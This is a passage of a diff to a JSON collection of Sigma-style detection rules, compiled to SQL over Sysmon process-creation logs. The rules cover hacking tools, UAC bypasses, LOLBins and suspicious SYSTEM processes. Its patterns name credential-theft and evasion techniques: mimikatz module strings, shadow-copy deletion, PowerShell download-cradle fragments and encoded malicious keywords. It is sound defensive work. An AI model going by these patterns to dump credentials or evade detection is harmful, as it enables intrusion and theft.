(e.g. the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate administrative use" + "Programs that use the same command line flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "status": "test", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Legitimate use" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "status": "experimental", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + }, + { + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": 